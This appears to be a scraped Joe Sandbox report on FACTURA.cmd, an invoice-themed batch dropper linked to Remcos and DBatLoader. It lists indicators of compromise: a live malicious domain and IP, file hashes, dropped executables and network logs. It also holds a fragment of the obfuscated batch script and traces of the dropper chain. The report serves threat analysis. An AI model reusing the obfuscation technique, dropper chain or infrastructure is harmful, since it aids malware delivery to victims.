                https://taksonsdfg.co.in/34243456dfgd/255_ZnrgbbhcbyxN/c$Host.COM, 00000009.00000003.2655006782.00000000008AB000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.2564991839.00000000008AA000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  https://taksonsdfg.co.in/HHost.COM, 00000009.00000003.2564991839.00000000008AA000.00000004.00000020.00020000.00000000.sdmptrueunknown
                  https://taksonsdfg.co.in/34243456dfgd/255_Znrgbbhcbyx&/Host.COM, 00000009.00000002.3032889978.00000000008AA000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    https://enterpriseregistration.windows.net/EnrollmentServer/key/kn.exefalseunknown
                    https://taksonsdfg.co.in/xHost.COM, 00000009.00000003.1865183641.00000000008AA000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.2455294317.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1832111190.000000000087B000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1935087068.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.2621473142.00000000008AA000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.2564991839.00000000008AA000.00000004.00000020.00020000.00000000.sdmptrueunknown
                    https://taksonsdfg.co.in/Host.COM, 00000009.00000003.2564991839.00000000008AA000.00000004.00000020.00020000.00000000.sdmptrueunknown
                    https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatahkn.exe, 00000006.00000000.1776491756.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1784579470.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1787962388.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1794360108.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmpfalseunknown
                    https://taksonsdfg.co.in/34243456dfgd/255_Znrgbbhcbyx/;Host.COM, 00000009.00000003.1832111190.000000000087B000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1865183641.00000000008A6000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      https://taksonsdfg.co.in/~Host.COM, 00000009.00000003.1923031357.00000000008AA000.00000004.00000020.00020000.00000000.sdmptrue
                        		unknown
                        https://taksonsdfg.co.in/34243456dfgd/255_ZnrgbbhcbyxB8Host.COM, 00000009.00000003.1832111190.000000000087B000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1865183641.00000000008A6000.00000004.00000020.00020000.00000000.sdmptrue
                          		unknown
                          https://taksonsdfg.co.in/34243456dfgd/255_Znrgbbhcbyxv/Host.COM, 00000009.00000003.2643538771.00000000008AA000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.2667836018.00000000008AA000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.2655006782.00000000008AB000.00000004.00000020.00020000.00000000.sdmptrue
                            		unknown
                            https://taksonsdfg.co.in:443/34243456dfgd/255_Znrgbbhcbyx;Host.COM, 00000009.00000002.3032889978.00000000008A0000.00000004.00000020.00020000.00000000.sdmptrue
                              		unknown
                              https://taksonsdfg.co.in/34243456dfgd/255_ZnrgbbhcbyxVHost.COM, 00000009.00000003.1832111190.000000000087B000.00000004.00000020.00020000.00000000.sdmptrue
                                		unknown
                                https://taksonsdfg.co.in/34243456dfgd/255_Znrgbbhcbyxo/Host.COM, 00000009.00000002.3032889978.00000000007FF000.00000004.00000020.00020000.00000000.sdmptrue
                                  		unknown
                                  https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svckn.exefalseunknown
                                  https://taksonsdfg.co.in/n/C$Host.COM, 00000009.00000003.2564991839.00000000008AA000.00000004.00000020.00020000.00000000.sdmptrue
                                    		unknown
                                    http://www.pmail.comHost.COM, Host.COM, 00000009.00000002.3035851816.0000000002E1E000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1800405801.0000000002892000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000002.3054244908.000000007FA30000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 00000009.00000002.3034224686.0000000002899000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1801015000.000000007F8EF000.00000004.00001000.00020000.00000000.sdmpfalseunknown
                                    https://%ws/%ws_%ws_%ws/service.svc/%wskn.exefalse
                                      		unknown
                                      https://enterpriseregistration.windows.net/EnrollmentServer/device/kn.exefalseunknown
                                      https://taksonsdfg.co.in/34243456dfgd/25Host.COM, 00000009.00000002.3052727983.000000002501D000.00000004.00001000.00020000.00000000.sdmptrue
                                        		unknown
                                        https://taksonsdfg.co.in/6/Host.COM, 00000009.00000003.2455294317.00000000008A7000.00000004.00000020.00020000.00000000.sdmptrue
                                          		unknown

                                          World Map of Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public IPs

                                          IPDomainCountryFlagASNASN NameMalicious
                                          108.170.55.202
                                          		taksonsdfg.co.inUnited States
                                          		20454SSASN2UStrue

                                          General Information

                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1532879
                                          Start date and time:2024-10-14 04:28:13 +02:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 8m 25s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:16
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:FACTURA.cmd
                                          Detection:MAL
                                          Classification:mal100.bank.troj.evad.winCMD@22/11@1/1
                                          EGA Information:
                                          • Successful, ratio: 100%
                                          HCA Information:
                                          • Successful, ratio: 100%
                                          • Number of executed functions: 60
                                          • Number of non-executed functions: 208
                                          Cookbook Comments:
                                          • Found application associated with file extension: .cmd

                                          Warnings

                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Report size getting too big, too many NtSetInformationFile calls found.

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          22:29:16API Interceptor109x Sleep call for process: Host.COM modified

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          108.170.55.202GestionPagoAProveedores_100920241725998901306_PDF.cmdGet hashmaliciousRemcos, DBatLoader, FormBookBrowse
                                            241481565-044416-sanlccjavap0003-6624_PDF.TXT.PNG.MPEG.CMD.cmdGet hashmaliciousRemcos, DBatLoader, FormBookBrowse
                                              Julcbozqsvtzlo.cmdGet hashmaliciousRemcos, AveMaria, DBatLoader, PrivateLoader, UACMeBrowse
                                                Uduknnywyznljn.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                  IN-34823_PO39276-pdf.vbeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                    Products_Specification.XLs.PIF.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                      PAYMENT SWIFT.XLs.exeGet hashmaliciousAveMaria, DBatLoader, UACMeBrowse
                                                        #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                          Your file name without extension goes here.exeGet hashmaliciousAgentTeslaBrowse
                                                            R9eF05c3nd.exeGet hashmaliciousAgentTeslaBrowse

                                                              Domains

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              taksonsdfg.co.inGestionPagoAProveedores_100920241725998901306_PDF.cmdGet hashmaliciousRemcos, DBatLoader, FormBookBrowse
                                                              • 108.170.55.202
                                                              241481565-044416-sanlccjavap0003-6624_PDF.TXT.PNG.MPEG.CMD.cmdGet hashmaliciousRemcos, DBatLoader, FormBookBrowse
                                                              • 108.170.55.202
                                                              Julcbozqsvtzlo.cmdGet hashmaliciousRemcos, AveMaria, DBatLoader, PrivateLoader, UACMeBrowse
                                                              • 108.170.55.202

                                                              ASNs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              SSASN2USAGjaVihni8.elfGet hashmaliciousMirai, GafgytBrowse
                                                              • 66.85.144.18
                                                              GestionPagoAProveedores_100920241725998901306_PDF.cmdGet hashmaliciousRemcos, DBatLoader, FormBookBrowse
                                                              • 108.170.55.202
                                                              241481565-044416-sanlccjavap0003-6624_PDF.TXT.PNG.MPEG.CMD.cmdGet hashmaliciousRemcos, DBatLoader, FormBookBrowse
                                                              • 108.170.55.202
                                                              SecuriteInfo.com.Trojan.Packed.9434.374.exeGet hashmaliciousSystemBCBrowse
                                                              • 66.85.173.12
                                                              SecuriteInfo.com.Trojan.Packed.9434.374.exeGet hashmaliciousSystemBCBrowse
                                                              • 66.85.173.12
                                                              Julcbozqsvtzlo.cmdGet hashmaliciousRemcos, AveMaria, DBatLoader, PrivateLoader, UACMeBrowse
                                                              • 108.170.55.202
                                                              http://masdd.line.pm/Get hashmaliciousUnknownBrowse
                                                              • 23.235.244.212
                                                              http://www.lesliehawes.comGet hashmaliciousUnknownBrowse
                                                              • 209.188.14.135
                                                              Xx1u7NEFhM.dllGet hashmaliciousUnknownBrowse
                                                              • 131.153.13.235
                                                              Xx1u7NEFhM.dllGet hashmaliciousUnknownBrowse
                                                              • 131.153.13.235

                                                              JA3 Fingerprints

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaCBrowse
                                                              • 108.170.55.202
                                                              file.exeGet hashmaliciousLummaCBrowse
                                                              • 108.170.55.202
                                                              20Listen.emlGet hashmaliciousHTMLPhisherBrowse
                                                              • 108.170.55.202
                                                              file.exeGet hashmaliciousLummaCBrowse
                                                              • 108.170.55.202
                                                              file.exeGet hashmaliciousLummaCBrowse
                                                              • 108.170.55.202
                                                              file.exeGet hashmaliciousLummaCBrowse
                                                              • 108.170.55.202
                                                              SecuriteInfo.com.Win32.Evo-gen.15503.22039.exeGet hashmaliciousLummaCBrowse
                                                              • 108.170.55.202
                                                              SecuriteInfo.com.Win32.Evo-gen.11764.10915.exeGet hashmaliciousLummaCBrowse
                                                              • 108.170.55.202
                                                              file.exeGet hashmaliciousLummaCBrowse
                                                              • 108.170.55.202
                                                              file.exeGet hashmaliciousLummaCBrowse
                                                              • 108.170.55.202

                                                              Dropped Files

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              C:\Users\Public\alpha.exerPO767575.cmdGet hashmaliciousDBatLoaderBrowse
                                                                Contact Form and Delivery Details ,pdf.cmdGet hashmaliciousDBatLoader, FormBookBrowse
                                                                  Duclot Collections.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                    GestionPagoAProveedores_100920241725998901306_PDF.cmdGet hashmaliciousRemcos, DBatLoader, FormBookBrowse
                                                                      Factura_pdf.batGet hashmaliciousUnknownBrowse
                                                                        Julcbozqsvtzlo.cmdGet hashmaliciousRemcos, AveMaria, DBatLoader, PrivateLoader, UACMeBrowse
                                                                          Justificante66a20daf29a24e355ccad8f0_pdf.cmdGet hashmaliciousUnknownBrowse
                                                                            PO#38595.cmdGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                              a5wqh2pM1I.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                out.cmdGet hashmaliciousUnknownBrowse

                                                                                  Created / dropped Files

                                                                                  C:\Users\Public\Host.GIF

                                                                                  Download File
                                                                                  Process:C:\Users\Public\kn.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):5214496
                                                                                  Entropy (8bit):3.69988814389252
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:vJ9zAzppcp+GT+lTGX5HLyGHRzBhwxoMpaxHTuQdkFT2KjErG0rQOV7FpJJ:n
                                                                                  MD5:3B1217270CC83A3802F4427110B2F82F
                                                                                  SHA1:B19C3DDA8DEFB57D8AE882AD1671BD64B1CDA655
                                                                                  SHA-256:C55B3820EA0A1F309061D749D5A741570BF599EA701C0ED3E3EF9DC57C8E5453
                                                                                  SHA-512:9147F24F77A96E8D8572E446467A2598DFDFAE10FBE0536F5FB28728BCF64A7874A262D762B74297FCA2E37C32DFD8273E9C0F911215B11E89AA9E3E5D3AD050
                                                                                  Malicious:false
                                                                                  Preview:0000.4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00..0010.b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00..0020.00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00..0030.00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00..0040.ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90..0050.54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73..0060.74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57..0070.69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00..0080.00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00..0090.00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00..00a0.00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00..00b0.00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00..00c0.00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00..00d0.00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00..00e0.00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00..00f0.00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00..0100.50 45 00 00 4c 01 09 00 19 5e 42 2a 00 00 00 00..0110.00 00 00 00 e0 00 8e 81 0b 01 02 19 00 5c 07 00..0120.00 42

                                                                                  C:\Users\Public\Libraries\Host.COM

                                                                                  Download File
                                                                                  Process:C:\Users\Public\kn.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):1483264
                                                                                  Entropy (8bit):6.671316642409848
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:Gj2o2Y8F82BK8Uk1zVvm+8OioUMxW24Q7Q9Z:2pihK+8OiSWaOZ
                                                                                  MD5:320D5ED383D73182150A145823610493
                                                                                  SHA1:CBCF06AA114D6A9C05B9EB1F4973B3EAA13B3534
                                                                                  SHA-256:B6EE73598C431B9C2BD15EB913BC7F01D007B0EE4B7A05A733C6CB384AAE5719
                                                                                  SHA-512:A2DD540CF3D22EC7BD09A82135ABE6A6B904F5473A1BF87230B5C315DC71E288A0DE9D05BE1CFB7F5BEBE872D38FBF15F2D9FE06FAD75B16DFC494CED2EE297B
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: Virustotal, Detection: 51%, Browse
                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................\...B.......w............@..........................`...................@...............................(...p...........................~......................................................T............................text....R.......T.................. ..`.itext.......p.......X.............. ..`.data...|............`..............@....bss.....P...@...........................idata...(.......*..................@....tls....4............>...................rdata...............>..............@..@.reloc...~...........@..............@..B.rsrc........p......................@..@.............`......................@..@................................................................................................

                                                                                  C:\Users\Public\alpha.exe

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\extrac32.exe
                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                  Category:modified
                                                                                  Size (bytes):289792
                                                                                  Entropy (8bit):6.135598950357573
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:k4WA1B9BxDfQWKORSqY4zOcmpdlc3gJdmtolSm:H1BhkWvSqY4zvmjOwJIT
                                                                                  MD5:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                  SHA1:F1EFB0FDDC156E4C61C5F78A54700E4E7984D55D
                                                                                  SHA-256:B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450
                                                                                  SHA-512:99E784141193275D4364BA1B8762B07CC150CA3CB7E9AA1D4386BA1FA87E073D0500E61572F8D1B071F2FAA2A51BB123E12D9D07054B59A1A2FD768AD9F24397
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                  Joe Sandbox View:
                                                                                  • Filename: rPO767575.cmd, Detection: malicious, Browse
                                                                                  • Filename: Contact Form and Delivery Details ,pdf.cmd, Detection: malicious, Browse
                                                                                  • Filename: Duclot Collections.bat, Detection: malicious, Browse
                                                                                  • Filename: GestionPagoAProveedores_100920241725998901306_PDF.cmd, Detection: malicious, Browse
                                                                                  • Filename: Factura_pdf.bat, Detection: malicious, Browse
                                                                                  • Filename: Julcbozqsvtzlo.cmd, Detection: malicious, Browse
                                                                                  • Filename: Justificante66a20daf29a24e355ccad8f0_pdf.cmd, Detection: malicious, Browse
                                                                                  • Filename: PO#38595.cmd, Detection: malicious, Browse
                                                                                  • Filename: a5wqh2pM1I.bat, Detection: malicious, Browse
                                                                                  • Filename: out.cmd, Detection: malicious, Browse
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........OH...&...&...&..V...&..E%...&..E"...&...'../&..E'...&..E#...&..E+...&..E....&..E$...&.Rich..&.................PE..d...S.............".................P..........@.............................p............`.................................................(...................4#...........`......`Z..T............................,...............4...... ........................text............................... ..`.rdata..<.... ......................@..@.data...P...........................@....pdata..4#.......$..................@..@.didat..............................@....rsrc...............................@..@.reloc.......`.......h..............@..B........................................................................................................................................................................................................................

                                                                                  C:\Users\Public\kn.exe

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\extrac32.exe
                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                  Category:modified
                                                                                  Size (bytes):1651712
                                                                                  Entropy (8bit):6.144018815244304
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:MeiElH5YZ5cv6r3HiaZQ8p4XGwiJDgN7MaikGLIsWWi4pT/Y/7hsyDAP760MKR:Me3lZYUvmSu4XTckYD0sWWiwT/MhTzK
                                                                                  MD5:F17616EC0522FC5633151F7CAA278CAA
                                                                                  SHA1:79890525360928A674D6AEF11F4EDE31143EEC0D
                                                                                  SHA-256:D252235AA420B91C38BFEEC4F1C3F3434BC853D04635453648B26B2947352889
                                                                                  SHA-512:3ED65172159CD1BCC96B5A0B41D3332DE33A631A167CE8EE8FC43F519BB3E2383A58737A41D25AA694513A68C639F0563A395CD18063975136DE1988094E9EF7
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u}{h1..;1..;1..;..;0..;%w.:2..;%w.:*..;%w.:!..;%w.:...;1..;...;%w.:...;%w.;0..;%w.:0..;Rich1..;................PE..d...+. H.........."..................L.........@....................................q.....`.......... ......................................@Q.......`..@........x..............l'..p5..T...........................`(..............x)......XC.......................text............................... ..`.rdata..T...........................@..@.data....&..........................@....pdata...x.......z...|..............@..@.didat.......P......................@....rsrc...@....`......................@..@.reloc..l'.......(..................@..B........................................................................................................................................................................................................................

                                                                                  \Device\Null

                                                                                  Download File
                                                                                  Process:C:\Users\Public\alpha.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):104
                                                                                  Entropy (8bit):4.403504238247217
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:HnRthLK5aTRECUAdROGCOwXWnjTRrGIAOFZRMQcv:HRoAREYTOGjHVF+
                                                                                  MD5:E14D0D771A7FEB9D78EA3DCA9197BA2A
                                                                                  SHA1:48E363AAD601D9073D803AA9D224BF9A7FC39119
                                                                                  SHA-256:0C13A861207709C246F13ACE164529F31F2F91CF14BD37795192D5B37E965BE6
                                                                                  SHA-512:3460F93FEA31D68E49B1B82EDCB8A2A9FCCE34910DD04DEE7BD7503DB8DAB6D1D5C73CBD2C15156DCB601512AD68DE6FEF7DCB8F8A72A8A0747248B378C17CF9
                                                                                  Malicious:false
                                                                                  Preview:The system cannot find message text for message number 0x400023a1 in the message file for Application...

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:ISO-8859 text, with very long lines (956), with CRLF line terminators
                                                                                  Entropy (8bit):5.1046823921890425
                                                                                  TrID:
                                                                                    File name:FACTURA.cmd
                                                                                    File size:7'518'388 bytes
                                                                                    MD5:41aff4b752555a0e4304ba0e04bb24c8
                                                                                    SHA1:a0cf311711779834c880e99799a8501165036a6c
                                                                                    SHA256:3b9f52447520a884c7ced8dbfb5d3cef7896a90910ef0b34b13cfecb9bd422cc
                                                                                    SHA512:8d59d88d17956929282ad6b08318e3c233c3e08badb4f6e9e77eb9e422f8ed8ae092c6dc43a523af0893be736991dcad82e22114030a588963987ff71b6f1f97
                                                                                    SSDEEP:49152:bi5/QaYmqMijFjB6yaHAd0QNEhTp0Ki1OspQcmItJXiCmqkU5Pq:C
                                                                                    TLSH:A8764297DE9F9245274843E7D24E8D218CD2FA3A28AD79A217E132845B33B4DFC5253C
                                                                                    File Content Preview:COMCOM..&@cls&@set "_...=DJcBebTEQGtSYd3yMnqU6HKs x1C5NmRI@9lwgZfrpVPahWz4F0X8oL2OkjiAuv7"..%_...:~33,1%%_...:~23,1%%_...:~4,1%%_...:~10,1%%_...:~24,1%"_...=%_...:~33,1%%_...:~53,1%%_...:~55,1%%_...:~16,1%%_...:~19,1%%_...:~35,1%%_...:~15,1%%_...:~3,1%%_.

                                                                                    File Icon

                                                                                    Icon Hash:9686878b929a9886

                                                                                    Network Behavior

                                                                                    Network Port Distribution

                                                                                    TCP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Oct 14, 2024 04:29:18.526503086 CEST49730443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:29:18.526592016 CEST44349730108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:29:18.529781103 CEST49730443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:29:18.530081987 CEST49730443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:29:18.530333042 CEST44349730108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:29:18.534131050 CEST49730443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:29:18.566191912 CEST49731443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:29:18.566289902 CEST44349731108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:29:18.566366911 CEST49731443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:29:18.571595907 CEST49731443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:29:18.571633101 CEST44349731108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:29:19.177738905 CEST44349731108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:29:19.177850008 CEST49731443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:29:19.199040890 CEST49731443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:29:19.199080944 CEST44349731108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:29:19.199588060 CEST44349731108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:29:19.243949890 CEST49731443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:29:19.253894091 CEST49731443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:29:19.299428940 CEST44349731108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:29:19.423852921 CEST44349731108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:29:19.424052954 CEST44349731108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:29:19.424110889 CEST49731443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:29:19.426276922 CEST49731443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:29:19.426276922 CEST49731443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:29:19.426314116 CEST44349731108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:29:19.426404953 CEST44349731108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:29:19.701814890 CEST49732443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:29:19.701906919 CEST44349732108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:29:19.702019930 CEST49732443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:29:19.702454090 CEST49732443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:29:19.702517033 CEST44349732108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:29:19.702827930 CEST49732443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:29:19.714466095 CEST49733443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:29:19.714514017 CEST44349733108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:29:19.714606047 CEST49733443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:29:19.714904070 CEST49733443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:29:19.714921951 CEST44349733108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:29:20.345284939 CEST44349733108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:29:20.345355034 CEST49733443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:29:20.346649885 CEST49733443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:29:20.346662998 CEST44349733108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:29:20.346991062 CEST44349733108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:29:20.348121881 CEST49733443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:29:20.395401001 CEST44349733108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:29:20.617245913 CEST44349733108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:29:20.617451906 CEST44349733108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:29:20.617522955 CEST49733443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:29:20.617643118 CEST49733443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:29:20.617667913 CEST44349733108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:29:20.617693901 CEST49733443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:29:20.617702007 CEST44349733108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:29:20.837148905 CEST49734443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:29:20.837208033 CEST44349734108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:29:20.837302923 CEST49734443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:29:20.837424994 CEST49734443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:29:20.837515116 CEST44349734108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:29:20.837568045 CEST49734443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:29:20.884394884 CEST49735443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:29:20.884495020 CEST44349735108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:29:20.884608030 CEST49735443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:29:20.884917021 CEST49735443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:29:20.884955883 CEST44349735108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:29:21.497071981 CEST44349735108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:29:21.497191906 CEST49735443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:29:21.498508930 CEST49735443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:29:21.498531103 CEST44349735108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:29:21.498872042 CEST44349735108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:29:21.499965906 CEST49735443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:29:21.547451973 CEST44349735108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:29:21.758301020 CEST44349735108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:29:21.758498907 CEST44349735108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:29:21.758572102 CEST49735443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:29:21.758652925 CEST49735443192.168.2.4108.170.55.202
